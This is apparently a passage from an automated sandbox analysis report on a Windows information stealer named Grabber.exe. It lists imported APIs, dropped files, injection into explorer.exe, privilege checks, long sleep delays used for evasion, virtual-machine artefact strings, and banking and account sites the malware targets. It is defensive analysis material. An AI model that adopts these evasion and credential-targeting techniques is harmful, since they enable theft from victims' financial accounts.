FOLDERPATHASHELL32.DLLLSTRCATAKERNEL32.DLLSETFILEATTRIBUTESAKERNEL32.DLLSHGETKNOWNFOLDERPATHSHELL32.DLLFREELIBRARYKERNEL32.DLLMOVEFILEWKERNEL32.DLLGETFILESIZEEXKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLGETVOLUMEINFORMATIONAKERNEL32.DLLGETTICKCOUNTKERNEL32.DLLWSPRINTFWUSER32.DLLWSPRINTFAUSER32.DLLVIRTUALALLOCKERNEL32.DLLREADFILEKERNEL32.DLLSLEEPKERNEL32.DLLVIRTUALFREEKERNEL32.DLLSETFILEPOINTERKERNEL32.DLLCREATEDIRECTORYWKERNEL32.DLLFINDFIRSTFILEWKERNEL32.DLLFINDNEXTFILEWKERNEL32.DLLFINDCLOSEKERNEL32.DLLCOPYFILEWKERNEL32.DLLWRITEFILEKERNEL32.DLLGETSYSTEMDIRECTORYWKERNEL32.DLLEXITPROCESSKERNEL32.DLLCREATEREMOTETHREADKERNEL32.DLLINTERNETOPENURLWWININET.DLLINTERNETREADFILEWININET.DLLHTTPQUERYINFOAWININET.DLLINTERNETOPENWWININET.DLLINTERNETCONNECTWWININET.DLLHTTPOPENREQUESTWWININET.DLLHTTPSENDREQUESTAWININET.DLLINTERNETCLOSEHANDLEWININET.DLLPATHISURLWSHLWAPI.DLLPATHCOMBINEWSHLWAPI.DLLPATHFINDFILENAMEWSHLWAPI.DLLSTRSTRASHLWAPI.DLLURLDOWNLOADTOFILEWURLMON.DLLCREATEPROCESSWKERNEL32.DLLSHELLEXECUTEWSHELL32.DLLGETMODULEFILENAMEWKERNEL32.DLLGETSHORTPATHNAMEWKERNEL32.DLLGETENVIRONMENTVARIABLEWKERNEL32.DLLREGOPENKEYEXWADVAPI32.DLLREGSETVALUEEXW
                  Source: systemsx.exe, svchost.exe, 616766F8886C145454191.exe, audiodg.exe, msiexec.exeBinary or memory string: IDAQ.EXE
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeMemory allocated: 16F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeMemory allocated: 31E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeMemory allocated: 2FF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8B88B0 CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,Thread32Next,CloseHandle,7_2_0E8B88B0
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\audiodg.exeWindow / User API: threadDelayed 1137Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2125Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 7569Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 703Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 673Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeWindow / User API: threadDelayed 2774Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeWindow / User API: threadDelayed 7050Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\_bz2.pydJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\_hashlib.pydJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\select.pydJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\_lzma.pydJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\unicodedata.pydJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\libcrypto-1_1.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\_socket.pydJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\python38.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                  Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\12DB.tmp.update.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\_ctypes.pydJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                  Source: C:\Windows\System32\svchost.exeEvaded block: after key decisiongraph_6-848
                  Source: C:\Windows\System32\audiodg.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Windows\System32\msiexec.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_11-1189
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-1189
                  Source: C:\Windows\System32\svchost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_6-1135
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeAPI coverage: 1.8 %
                  Source: C:\Users\user\Desktop\Grabber.exe TID: 5772Thread sleep count: 178 > 30Jump to behavior
                  Source: C:\Windows\System32\msiexec.exe TID: 6200Thread sleep time: -50000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\msiexec.exe TID: 6200Thread sleep count: 1197 > 30Jump to behavior
                  Source: C:\Windows\System32\msiexec.exe TID: 6200Thread sleep time: -59850000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\msiexec.exe TID: 1868Thread sleep count: 80 > 30Jump to behavior
                  Source: C:\Windows\System32\msiexec.exe TID: 1868Thread sleep time: -216000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\audiodg.exe TID: 3560Thread sleep time: -50000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\audiodg.exe TID: 3560Thread sleep count: 1137 > 30Jump to behavior
                  Source: C:\Windows\System32\audiodg.exe TID: 3560Thread sleep time: -56850000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\audiodg.exe TID: 5520Thread sleep count: 88 > 30Jump to behavior
                  Source: C:\Windows\System32\audiodg.exe TID: 5520Thread sleep time: -237600s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 5560Thread sleep time: -2018750s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 1892Thread sleep time: -360000s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 5560Thread sleep time: -7190550s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe TID: 6548Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\msiexec.exeLast function: Thread delayed
                  Source: C:\Windows\System32\audiodg.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeCode function: 0_2_00007FF79CD671BC _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF79CD671BC
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F279B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,20_2_00007FF641F279B0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F285A0 FindFirstFileExW,FindClose,20_2_00007FF641F285A0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F40B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,20_2_00007FF641F40B84
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F285A0 FindFirstFileExW,FindClose,21_2_00007FF641F285A0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F40B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,21_2_00007FF641F40B84
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F279B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,21_2_00007FF641F279B0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B837303C FindFirstFileExW,FindNextFileW,FindClose,21_2_00007FF8B837303C
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B8373280 FindFirstFileExW,FindNextFileW,FindClose,21_2_00007FF8B8373280
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8B7B10 GetSystemInfo,VirtualAlloc,VirtualAlloc,7_2_0E8B7B10
                  Source: C:\Windows\System32\msiexec.exeThread delayed: delay time: 50000
                  Source: C:\Windows\System32\msiexec.exeThread delayed: delay time: 50000
                  Source: C:\Windows\System32\msiexec.exeThread delayed: delay time: 50000
                  Source: C:\Windows\System32\audiodg.exeThread delayed: delay time: 50000
                  Source: C:\Windows\System32\audiodg.exeThread delayed: delay time: 50000
                  Source: C:\Windows\System32\audiodg.exeThread delayed: delay time: 50000
                  Source: C:\Windows\explorer.exeThread delayed: delay time: 90000
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\Grabber.exeFile opened: C:\Users\user\AppData\Local\
                  Source: C:\Users\user\Desktop\Grabber.exeFile opened: C:\Users\user\AppData\
                  Source: C:\Users\user\Desktop\Grabber.exeFile opened: C:\Users\user\
                  Source: C:\Users\user\Desktop\Grabber.exeFile opened: C:\Users\user\AppData\Local\Temp\B334.tmp\B335.tmp
                  Source: C:\Users\user\Desktop\Grabber.exeFile opened: C:\Users\user\AppData\Local\Temp\B334.tmp
                  Source: C:\Users\user\Desktop\Grabber.exeFile opened: C:\Users\user\AppData\Local\Temp\B334.tmp\B335.tmp\B336.tmp
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: explorer.exe, 00000007.00000000.2061516657.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3299555771.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2352212980.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
                  Source: explorer.exe, 00000007.00000000.2061516657.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: explorer.exe, 00000007.00000000.2049075653.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003776000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,1
                  Source: explorer.exe, 00000007.00000000.2061516657.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2352212980.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3299555771.0000000009B2C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2447810142.0000000001534000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: explorer.exe, 00000007.00000003.3098330596.0000000009C92000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                  Source: explorer.exe, 00000007.00000000.2061516657.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                  Source: explorer.exe, 00000007.00000003.3098330596.0000000009C92000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: explorer.exe, 00000007.00000002.3296402764.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: explorer.exe, 00000007.00000003.2355314746.0000000003553000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: explorer.exe, 00000007.00000003.3101098577.0000000009C21000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
                  Source: explorer.exe, 00000007.00000000.2061516657.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: explorer.exe, 00000007.00000000.2053655662.000000000769A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: explorer.exe, 00000007.00000002.3296402764.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: explorer.exe, 00000007.00000003.3098330596.0000000009C92000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 00000007.00000003.2355314746.0000000003553000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
